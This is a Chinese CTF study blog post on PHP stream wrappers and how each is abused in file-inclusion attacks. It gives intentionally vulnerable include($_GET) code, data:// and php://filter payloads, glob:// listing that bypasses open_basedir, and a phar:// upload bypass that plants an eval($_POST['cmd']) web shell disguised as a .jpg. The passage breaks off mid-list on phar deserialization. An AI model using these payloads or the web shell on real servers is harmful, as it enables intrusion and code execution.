

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;dark&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="Na0h_1e3">
  <meta name="keywords" content="Na0h1e3,blog,博客,web,ctf,渗透">
  <title>php伪协议的学习 - Na0h的神光棒存放地</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.4.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"na0hblog.top","root":"/","version":"1.8.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"🐳_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":true,"baidu":null,"google":"G-MLL1PZ9RBK","gtag":260676474,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"zjCV2oT3ti8Lyk0insYTRpLr-gzGzoHsz","app_key":"y4AXlgIqQsV7Enr3IFS3r6Ck","server_url":"https://zjcv2ot3.lc-cn-n1-shared.com"}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.3.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Na0h的神光棒存放地</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/textbg.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="php伪协议的学习">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-02-25 22:03" pubdate>
        2021年2月25日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      4.1k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      52
       分钟
    </span>
  

  
  
    
      <!-- LeanCloud 统计文章PV -->
      <span id="leancloud-page-views-container" class="post-meta" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="leancloud-page-views"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">php伪协议的学习</h1>
            
              <p class="note note-info">
                
                  本文最后更新于：2021年2月25日 晚上
                
              </p>
            
            <div class="markdown-body">
              <!-- more -->

<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>第一次接触php伪协议是请学长帮忙看的一个站所涉及到的glob伪协议<br>之前就有学习的念头，后来因为种种原因（主要是拖延症）拖了3个多月。。<br>最近刷web题的时候也接触很多，就仔细看一下</p>
<p>顺便安利首歌，为了放在这还学了一门新活</p>
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width="330" height="86" src="//music.163.com/outchain/player?type=2&id=1459439332&auto=0&height=66"></iframe>

<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs html"># 上面播放器的代码如下（仅网易云外链链接，其他播放器请自行百度）<br><span class="hljs-tag">&lt;<span class="hljs-name">iframe</span> <span class="hljs-attr">frameborder</span>=<span class="hljs-string">&quot;no&quot;</span> <span class="hljs-attr">border</span>=<span class="hljs-string">&quot;0&quot;</span> <span class="hljs-attr">marginwidth</span>=<span class="hljs-string">&quot;0&quot;</span> <span class="hljs-attr">marginheight</span>=<span class="hljs-string">&quot;0&quot;</span> <span class="hljs-attr">width</span>=<span class="hljs-string">&quot;330&quot;</span> <span class="hljs-attr">height</span>=<span class="hljs-string">&quot;86&quot;</span> <span class="hljs-attr">src</span>=<span class="hljs-string">&quot;//music.163.com/outchain/player?type=1&amp;id=32069326&amp;auto=0&amp;height=66&quot;</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">iframe</span>&gt;</span><br># width(宽度) ; height(高度)<br># type = 歌曲(1) | 歌单(2) | 电台(3)<br># id = 歌曲ID号<br># auto = 自动播放(1) | 手动播放(0)<br></code></pre></td></tr></table></figure>
<h1 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h1><p>虽说是为了解伪协议在渗透/ctf中的各种运用，但还是要去官方文档看看：</p>
<p>php支持的伪协议如下：（<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/wrappers.php">PHP: 支持的协议和封装协议 - Manual</a>）</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs php">file:<span class="hljs-comment">// — 访问本地文件系统</span><br>http:<span class="hljs-comment">// — 访问 HTTP(s) 网址</span><br>ftp:<span class="hljs-comment">// — 访问 FTP(s) URLs</span><br>php:<span class="hljs-comment">// — 访问各个输入/输出流（I/O streams）</span><br>zlib:<span class="hljs-comment">// — 压缩流</span><br>data:<span class="hljs-comment">// — 数据（RFC 2397）</span><br>glob:<span class="hljs-comment">// — 查找匹配的文件路径模式</span><br>phar:<span class="hljs-comment">// — PHP 归档</span><br>ssh2:<span class="hljs-comment">// — Secure Shell 2</span><br>rar:<span class="hljs-comment">// — RAR</span><br>ogg:<span class="hljs-comment">// — 音频流</span><br>expect:<span class="hljs-comment">// — 处理交互式的流</span><br></code></pre></td></tr></table></figure>
<blockquote>
<p>在php.ini中，allow_url_fopen 和allow_url_include会影响到fopen等等和include等等函数对于伪协议的支持；<br>且allow_url_include依赖allow_url_fopen，所以allow_url_fopen不开启的话，allow_url_include也是无法使用的。</p>
</blockquote>
<h2 id="file"><a href="#file" class="headerlink" title="file://"></a>file://</h2><ul>
<li><p>file:// — 访问本地文件系统；<br>ctf中常用于读取本地文件、配合curl_exec实现任意文件读取（curl支持伪协议）</p>
</li>
<li><p>不受<code>allow_url_fopen</code>、<code>allow_url_include</code>影响</p>
</li>
<li><p>运用：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs awk">?xxx=file:<span class="hljs-regexp">//</span>文件的绝对路径和文件名<br><br>eg: ?xxx=file:<span class="hljs-regexp">//</span>C:<span class="hljs-regexp">/Users/</span>ls<span class="hljs-regexp">/Desktop/</span><span class="hljs-number">1</span>.txt<br></code></pre></td></tr></table></figure>
<p>eg：file://读取+文件包含</p>
<blockquote>
<p>1.php：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;hhh&#x27;</span>]))&#123;<br> <span class="hljs-keyword">include</span> <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;hhh&#x27;</span>];<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<p>1.txt：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> phpinfo(); <span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
</blockquote>
</li>
</ul>
<p>  <img src="https://i.loli.net/2021/02/24/g6w8WleFGKiBhQY.png" srcset="/img/loading.gif" alt="成功读取并包含啦"></p>
<h2 id="http-、https"><a href="#http-、https" class="headerlink" title="http://、https://"></a>http://、https://</h2><ul>
<li><p>http:// – https:// — 访问 HTTP(s) 网址；允许通过 <code>HTTP 1.0</code> 的 GET方法，以只读访问文件或资源；<br>ctf中通常用于远程包含</p>
</li>
<li><p><code>allow_url_fopen</code>:on<br><code>allow_url_include</code> :on</p>
</li>
<li><p>运用：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs awk">http:<span class="hljs-regexp">//u</span>rl/file.php<br>http:<span class="hljs-regexp">//u</span>ser:password@example.com<br></code></pre></td></tr></table></figure>
<p>eg:</p>
</li>
</ul>
<p><img src="https://i.loli.net/2021/02/24/PtXaz51VJiH8ujB.png" srcset="/img/loading.gif" alt="先打开allow_url_fopen和allow_url_include"></p>
<p><img src="https://i.loli.net/2021/02/24/Zpq9OTWVRJvbMfo.png" srcset="/img/loading.gif" alt="远程包含~"></p>
<h2 id="zip-amp-bzip2-amp-zlib"><a href="#zip-amp-bzip2-amp-zlib" class="headerlink" title="zip:// &amp; bzip2:// &amp; zlib://"></a>zip:// &amp; bzip2:// &amp; zlib://</h2><ul>
<li><p>不受<code>allow_url_fopen</code>、<code>allow_url_include</code>影响<br>zip:// 需<code>php版本&gt;=5.3.0</code></p>
</li>
<li><p><code>zip:// &amp; bzip2:// &amp; zlib://</code> 均属于压缩流，可以访问压缩文件中的子文件，不需要指定后缀名，可修改为任意后缀</p>
</li>
<li><p>运用：</p>
<blockquote>
<p><code>zip:// [压缩文件绝对路径]#[压缩文件内的子文件名]</code>- 处理的是 ‘.zip’ 后缀的压缩包里的文件<br>zip://archive.zip#dir/file.txt<br><code>compress.bzip2://绝对路径 | 相对路径</code> - 处理的是 ‘.bz2’ 后缀的压缩包<br>compress.bzip2://file.bz2<br><code>compress.zlib://绝对路径 | 相对路径</code>- 处理的是 ‘.gz’ 后缀的压缩包<br>compress.zlib://file.gz </p>
</blockquote>
</li>
</ul>
<h2 id="data"><a href="#data" class="headerlink" title="data://"></a>data://</h2><ul>
<li><p><code>allow_url_fopen</code> ：on<br><code>allow_url_include</code>：on<br><code>PHP版本 &gt;= 5.2</code></p>
</li>
<li><p>运用：<code>data:资源类型;编码,内容</code><br><code>?xxx=data://text/plain;base64,(base64编码的内容)</code>或：<code>?xxx=data:text/plain,(url编码的内容)</code></p>
</li>
</ul>
<blockquote>
<p>eg:</p>
<p>xxx.php?file=<code>data://</code>text/plain,<?php phpinfo()?></p>
<p>xxx.php?file=<code>data://</code>text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=</p>
<p>或(省略//)</p>
<p>xxx.php?file=<code>data:</code>text/plain,<?php phpinfo()?></p>
<p>xxx.php?file=<code>data:</code>text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=</p>
</blockquote>
<h2 id="php"><a href="#php" class="headerlink" title="php://"></a>php://</h2><ul>
<li>php:// — 访问各个输入/输出流；<br>其中又有：<br>php://stdin、 php://stdout 、 php://stderr  （允许直接访问 PHP 进程相应的输入或者输出流）<br>php://input、php://output、php://filter<br>php://fd、php://memory、php://temp</li>
<li><code>php://filter</code>不受<code>allow_url_fopen</code>、<code>allow_url_include</code>影响;<br><code>php://input</code>、<code>php://stdin</code>、<code>php://memory</code>、<code>php://temp</code>受限于<code>allow_url_include</code></li>
<li>允许读取：<code>php://stdin</code>、 <code>php://input</code>、 <code>php://fd</code>、 <code>php://memory</code> 、 <code>php://temp</code><br>允许写入|追加：<code>php://stdout</code>、 <code>php://stderr</code>、 <code>php://output</code>、 <code>php://fd</code>、 <code>php://memory</code>、<code>php://temp</code><br>允许同时读写：<code>php://fd</code>、 <code>php://memory</code> 、 <code>php://temp</code></li>
</ul>
<h3 id="php-fd"><a href="#php-fd" class="headerlink" title="php://fd"></a>php://fd</h3><p><code>php://fd</code> 允许直接访问指定的文件描述符。 如 <code>php://fd/3</code> 引用了文件描述符 3</p>
<h3 id="php-memory-和-php-temp"><a href="#php-memory-和-php-temp" class="headerlink" title="php://memory 和 php://temp"></a>php://memory 和 php://temp</h3><p><code>php://memory</code> 和 <code>php://temp</code> 是类似文件包装器的数据流，允许读写临时数据。<br> 两者的唯一区别是 <code>php://memory</code> 总是把数据储存在内存中， 而 <code>php://temp</code> 会在内存量达到预定义的限制后（默认是 2MB）存入临时文件中。 临时文件位置的决定和 <code>sys_get_temp_dir()</code> 的方式一致。</p>
<p><code>php://temp</code> 的内存限制可通过添加 <code>/maxmemory:NN</code> 来控制，<code>NN</code> 是以字节为单位、保留在内存的最大数据量，超过则使用临时文件。</p>
<h3 id="php-output"><a href="#php-output" class="headerlink" title="php://output"></a>php://output</h3><p>允许你以 <code>print</code> 和 <code>echo</code> 一样的方式写入到输出缓冲区。</p>
<p>eg：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>  <br><span class="hljs-variable">$code</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;hhh&quot;</span>];  <br>file_put_contents(<span class="hljs-variable">$code</span>,<span class="hljs-string">&quot;output success&quot;</span>);   <br><span class="hljs-meta">?&gt;</span>  <br></code></pre></td></tr></table></figure>
<p><img src="https://i.loli.net/2021/02/24/i82sXIxVFB5Cc4N.png" srcset="/img/loading.gif"></p>
<h3 id="php-input"><a href="#php-input" class="headerlink" title="php://input"></a>php://input</h3><ul>
<li>php://input-可以访问请求的原始数据，POST请求的情况下php://input可以获取post的数据<br>ps：<code>enctype=&quot;multipart/form-data&quot;</code> 时 php://input 是无效的</li>
<li>需开启<code>allow_url_include</code></li>
<li>利用方法：<br>① 将要GET的参数?xxx=php://input<br>② 用post方法传入想要file_get_contents()函数返回的值</li>
</ul>
<h3 id="php-filter"><a href="#php-filter" class="headerlink" title="php://filter"></a>php://filter</h3><ul>
<li><p>是一种元封装器，设计用于数据流打开时的筛选过滤应用。可用于读写文件、甚至getshell</p>
</li>
<li><p>不受<code>allow_url_fopen</code>、<code>allow_url_include</code>影响</p>
</li>
<li><p>参数如下：</p>
<table>
<thead>
<tr>
<th><strong>php://filter 参数</strong></th>
<th align="center"></th>
</tr>
</thead>
<tbody><tr>
<td>名称</td>
<td align="center">描述</td>
</tr>
<tr>
<td><code>resource=&lt;要过滤的数据流&gt;</code></td>
<td align="center">必须。它指定了你要筛选过滤的数据流</td>
</tr>
<tr>
<td><code>read=&lt;读链的筛选列表&gt;</code></td>
<td align="center">可选。可以设定一个或多个过滤器名称，以管道符（`</td>
</tr>
<tr>
<td><code>write=&lt;写链的筛选列表&gt;</code></td>
<td align="center">可选。可以设定一个或多个过滤器名称，以管道符（`</td>
</tr>
<tr>
<td><code>&lt;；两个链的筛选列表&gt;</code></td>
<td align="center">任何没有以<code>read=</code>或<code>write=</code>作前缀的筛选器列表会视情况应用于读或写链</td>
</tr>
</tbody></table>
</li>
<li><p>运用：<br>eg：<code>php://filter/read=convert.base64-encode/resource=hhh.php</code><br>使用了过滤器：<code>convert.base64-encode</code>：将输入流进行base64编码；<br><code>resource=hhh.php</code>：数据源自文件hhh.php，也就是读取hhh.php文件嘛</p>
</li>
</ul>
<h4 id="过滤器"><a href="#过滤器" class="headerlink" title="过滤器"></a>过滤器</h4><p>官方文档<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/filters.php">PHP: 可用过滤器列表 - Manual</a></p>
<h5 id="字符串过滤器-string"><a href="#字符串过滤器-string" class="headerlink" title="字符串过滤器(string.*)"></a>字符串过滤器(string.*)</h5><p>每个过滤器都正如其名字暗示的那样工作并与内置的 PHP 字符串函数的行为相对应</p>
<ul>
<li><p>string.rot13：对字符串执行 ROT13 转换；等同于用 <code>str_rot13()</code>函数处理所有的流数据</p>
<blockquote>
<p>ROT13 编码简单地使用字母表中后面第 13 个字母替换当前字母，同时忽略非字母表中的字符。编码和解码都使用相同的函数，传递一个编码过的字符串作为参数，将得到原始字符串。</p>
</blockquote>
</li>
<li><p>string.toupper：将字符串转化为大写；等同于用 <code>strtoupper()</code>函数处理所有的流数据</p>
</li>
<li><p>string.tolower：将字符串转化为小写；等同于用 <code>strtolower()</code>函数处理所有的流数据</p>
</li>
<li><p><strong>string.strip_tags</strong>：从字符串中去除 HTML 和 PHP 标记；等同于用 <code>strip_tags()</code>函数处理所有的流数据<br>从5.0.0启用——到7.3.0废弃，官方强烈建议不使用此特性；<br>原因就在于此特性引发的各种漏洞，这里大致看了两个：<br>1、使用<code>php://filter/string.strip_tags</code>导致php7 segment fault，如果在同时上传了一个文件，那么这个tmp file就会一直留在tmp目录(<code>&lt;php7.2</code>)，再进行文件名爆破就可以getshell。<a target="_blank" rel="noopener" href="https://coomrade.github.io/2018/10/26/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E7%9A%84%E4%B8%80%E4%BA%9Bgetshell%E5%A7%BF%E5%8A%BF/">例1：文件包含的一些getshell姿势 </a><br>2、PHP的标签本质上是一段xml代码，所以我们可以使用<code>php://filter</code>的<code>string.strip_tags</code>过滤器，去除这一段代码(<code>&lt;?php exit();?&gt;</code>)。<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7852#toc-1">例2：某OK最新版漏洞组合拳GETSHELL </a></p>
</li>
</ul>
<h5 id="转换过滤器-convert"><a href="#转换过滤器-convert" class="headerlink" title="转换过滤器(convert.*)"></a>转换过滤器(convert.*)</h5><ul>
<li>自 PHP 5.0.0</li>
<li>base64：<ul>
<li><code>convert.base64-encode</code>：对数据进行base64编码；等同于用base64_encode()处理所有的流数据</li>
<li><code>convert.base64-decode</code>：对数据进行base64解码；等同于用base64_decode()处理所有的流数据<br>ps：<code>convert.base64-encode</code>支持以一个关联数组给出的参数<br>1、<code>line-length</code>：决定分隔步长；base64 输出将被 <code>line-length</code>个字符为长度而截成块<br>2、<code>line-break-chars</code>：决定分隔符；每块将被用给出的字符隔开<br>(这些参数的效果和用<code>base64_encode()</code>再加上<code>chunk_split()</code>相同)</li>
</ul>
</li>
<li>quoted-printable（ASCII码二进制形式）：<ul>
<li><code>convert.quoted-printable-encode</code>：将 quoted-printable 字符串转换为 8-bit 二进制字符串；等同于用 quoted_printable_decode()函数处理所有的流数据</li>
<li><code>convert.quoted-printable-decode</code>：没有和 convert.quoted-printable-encode相对应的函数<br>ps：<code>convert.quoted-printable-encode</code>支持以一个关联数组给出的参数。<br>1、<code>convert.quoted-printable-encode</code>：<code>line-length</code>、<code>line-break-chars</code>还有布尔参数 <code>binary</code>和 <code>force-encode-first</code><br>2、<code>convert.base64-decode</code>只支持 <code>line-break-chars</code>参数（作为从编码载荷中剥离的类型提示）</li>
</ul>
</li>
</ul>
<h5 id="压缩过滤器-zlib-bzip2"><a href="#压缩过滤器-zlib-bzip2" class="headerlink" title="压缩过滤器(zlib | bzip2.*)"></a>压缩过滤器(zlib | bzip2.*)</h5><p>ps：压缩过滤器 不产生命令行工具如 <code>gzip</code>的头和尾信息。只是压缩和解压数据流中的有效载荷部分</p>
<ul>
<li>自 PHP 5.1.0；</li>
<li><code>zlib.deflate（压缩）</code>、 <code>zlib.inflate（解压）</code><br><code>deflate</code>过滤器可以接受以一个关联数组传递的最多<strong>三</strong>个参数：<br>1、<code>level</code>：定义压缩强度（1-9）。数字更高通常会产生更小的载荷，但要消耗更多的处理时间。其中：0（完全不压缩）和 -1（zlib 内部默认值，目前是 6）<br>2、<code>window</code>：是压缩回溯窗口大小，以二的次方表示（默认为15）。更高的值（大到 15 —— 32768 字节）产生更好的压缩效果但消耗更多内存，低的值（低到 9 —— 512 字节）产生产生较差的压缩效果但内存消耗低。<br>3、<code>memory</code>用来指示要分配多少工作内存。合法的数值范围是从 1（最小分配）到 9（最大分配）。内存分配仅影响速度，不会影响生成的载荷的大小。</li>
<li><code>bzip2.compress</code>和 <code>bzip2.decompress</code>工作的方式与上面讲的 zlib 过滤器相同。 <ul>
<li><code>bzip2.compress</code>接受以一个关联数组给出的最多<strong>两</strong>个参数：<br>1、<code>blocks</code>：(1-9)，指定分配多少个 100K 字节的内存块作为工作区<br>2、<code>work</code>：(0-250)，指定在退回到一个慢一些，但更可靠的算法之前做多少次常规压缩算法的尝试。调整此参数仅影响到速度，压缩输出和内存使用都不受此设置的影响。将此参数设为 0 指示 bzip 库使用内部默认算法</li>
<li><code>bzip2.decompress</code>仅接受一个参数，可以用普通的布尔值传递，或者用一个关联数组中的 <code>small</code>单元传递。当 <code>small</code>设为 <code>&amp;true; 值</code>时，指示 bzip 库用最小的内存占用来执行解压缩，代价是速度会慢一些。</li>
</ul>
</li>
</ul>
<h5 id="加密过滤器"><a href="#加密过滤器" class="headerlink" title="加密过滤器"></a>加密过滤器</h5><ul>
<li><code>mcrypt.*</code>、<code>mdecrypt.*</code>使用 libmcrypt 提供对称的加密和解密<br>支持 mcrypt 扩展库中相同的算法，格式为 <code>mcrypt.ciphername</code><br>(<code>ciphername</code>是密码的名字,将被传递给 mcrypt_module_open())</li>
<li>mcrypt 过滤器参数：<table>
<thead>
<tr>
<th align="left">参数</th>
<th align="left">是否必须</th>
<th align="left">默认值</th>
<th align="left">取值举例</th>
</tr>
</thead>
<tbody><tr>
<td align="left">mode</td>
<td align="left">可选</td>
<td align="left">cbc</td>
<td align="left">cbc, cfb, ecb, nofb, ofb, stream</td>
</tr>
<tr>
<td align="left">algorithms_dir</td>
<td align="left">可选</td>
<td align="left">ini_get(‘mcrypt.algorithms_dir’)</td>
<td align="left">algorithms 模块的目录</td>
</tr>
<tr>
<td align="left">modes_dir</td>
<td align="left">可选</td>
<td align="left">ini_get(‘mcrypt.modes_dir’)</td>
<td align="left">modes 模块的目录</td>
</tr>
<tr>
<td align="left">iv</td>
<td align="left">必须</td>
<td align="left">N/A</td>
<td align="left">典型为 8，16 或 32 字节的二进制数据。根据密码而定</td>
</tr>
<tr>
<td align="left">key</td>
<td align="left">必须</td>
<td align="left">N/A</td>
<td align="left">典型为 8，16 或 32 字节的二进制数据。根据密码而定</td>
</tr>
</tbody></table>
</li>
</ul>
<h2 id="glob"><a href="#glob" class="headerlink" title="glob://"></a>glob://</h2><ul>
<li><p>glob:// — 查找匹配的文件路径模式</p>
</li>
<li><p>PHP版本&gt;=5.3.0</p>
</li>
<li><p>运用：（这里是学长教的hh）</p>
<p><strong>设计缺陷导致的任意文件名列出</strong>：由于PHP在设计的时候（可以通过源码来进行分析），对于glob伪协议的实现过程中不检测open_basedir以及safe_mode也是不会检测的，由此可利用glob://罗列文件名<br>（也就是说在可读权限下，可以得到文件名，但无法读取文件内容；可以在搜索服务器旁站使用~）</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">#以下三种payload，都可以将扫描结果输出，绝对路径|相对路径都可以</span><br>var_dump(scandir(<span class="hljs-string">&quot;glob:///*&quot;</span>));<br>print_r(scandir(<span class="hljs-string">&quot;glob://./*&quot;</span>));<br><span class="hljs-keyword">echo</span> json_encode(scandir(<span class="hljs-string">&quot;glob://../*&quot;</span>));<br><span class="hljs-comment"># 以下是学长的碎碎念</span><br><span class="hljs-comment"># （关键在于 scandir() + glob伪协议</span><br><span class="hljs-comment"># （不过实际上也可以用别的方法来弄，这个涉及到CTF。。一般来说不会这么绝</span><br><span class="hljs-comment"># （比如 opendir 吧</span><br></code></pre></td></tr></table></figure>


</li>
</ul>
<h2 id="phar"><a href="#phar" class="headerlink" title="phar://"></a>phar://</h2><ul>
<li><p>phar:// — PHP 归档，将多个文件组合成一个文件</p>
</li>
<li><p>不受<code>allow_url_fopen</code>、<code>allow_url_include</code>影响</p>
</li>
<li><p>运用：</p>
<p><strong>1、绕过上传限制</strong></p>
<p>可以利于phar://绕过一些上传限制，多数情况下搭配文件包含使用</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment"># 构造木马shell.php-&gt;(压缩)xxx.zip-&gt;(修改后缀)xxx.jpg-&gt;上传-&gt;phar://xxx.jpg/shell.php</span><br><span class="hljs-number">1</span>、构造木马 shell.php: <br>	<span class="hljs-meta">&lt;?php</span> @<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&quot;cmd&quot;</span>]);<span class="hljs-meta">?&gt;</span><br><span class="hljs-number">2</span>、将shell.php压缩，并修改后缀名为jpg：xxx.jpg(实际是带有文件shell.php但修改了后缀名的压缩包)<br><span class="hljs-number">3</span>、上传xxx.jpg并配合文件包含解析木马（payload：<span class="hljs-string">&#x27;phar://xxx.jpg/shell.php&#x27;</span>）：<br>	<span class="hljs-meta">&lt;?php</span> <br>	<span class="hljs-keyword">include</span>(<span class="hljs-string">&#x27;phar://xxx.jpg/shell.php&#x27;</span>);<br>	<span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<p><img src="https://i.loli.net/2021/02/25/xKtb5WPdZQJFaEN.png" srcset="/img/loading.gif"></p>
<p><strong>2、phar反序列化漏洞</strong></p>
<ul>
<li><p>（ps : 也是反序列化漏洞，但无需借助unserialize()函数）</p>
</li>
<li><p>PHP反序列化漏洞通常是<strong>借助unserialize()函数</strong><br>但<strong>利用phar:// 伪协议</strong>也可以触发PHP反序列化漏洞：<br>1、phar文件以序列化的形式存储用户自定义的meta-data；<br>2、当使用phar://读取phar文件时，就会反序列化meta-data储存的信息</p>
</li>
<li><p><strong>利用条件</strong>：(ps:由此可以知道如何修复漏洞咯~)<br><code>可以上传phar文件</code><br><code>有可用魔术方法</code><br><code>文件操作函数的参数可控，且:、/、phar等特殊字符没有被过滤</code></p>
</li>
